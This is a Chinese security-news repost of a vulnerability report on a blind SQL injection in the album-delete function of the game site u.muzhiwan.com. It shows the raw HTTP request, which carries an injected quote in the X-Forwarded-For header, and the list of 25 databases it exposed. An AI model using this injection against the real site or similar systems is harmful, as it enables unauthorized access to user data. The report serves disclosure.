频道栏目
首页 > 资讯 > 网站安全 > 正文

拇指玩某处存在SQL盲注涉及千万数据

16-02-20        来源:[db:作者]  
收藏   我要投稿

登录后选择一个游戏加入专辑
 

11_meitu_1.jpg



然后在删除操作处存在注入
 

22_meitu_2.jpg


 

GET /index.php?action=profile&opt=DeleteOne&aid=4794&type=album HTTP/1.1
Host: u.muzhiwan.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/plain, */*; q=0.01
Accept-Language: zh,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://u.muzhiwan.com/index.php?action=profile&opt=album
Cookie: 
X-Forwarded-For: 127.0.0.1'
Connection: keep-alive


 

xx.png

还是那些个数据库
 

available databases [25]:
[*] anquanxia
[*] applanet_user
[*] bug
[*] googleinstall
[*] googlemarket
[*] googlemarketgame
[*] information_schema
[*] muzhiwan
[*] muzhiwan130409
[*] muzhiwan130417
[*] muzhiwanbbs
[*] muzhiwanbbstest
[*] muzhiwantest
[*] mysql
[*] mzw
[*] mzw_new_gz
[*] mzw_oa
[*] mzwtest
[*] redmine
[*] sdk
[*] stat
[*] stat_sdk
[*] test
[*] testlink
[*] wikidatabase


 

222.png

 

解决方案:

过滤

相关TAG标签
上一篇:吉利汽车晋中基地Juniper防火墙通过SSH 加默认弱口令可登录
下一篇:Siteserver在空间模块上存在一处SQL注入漏洞
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站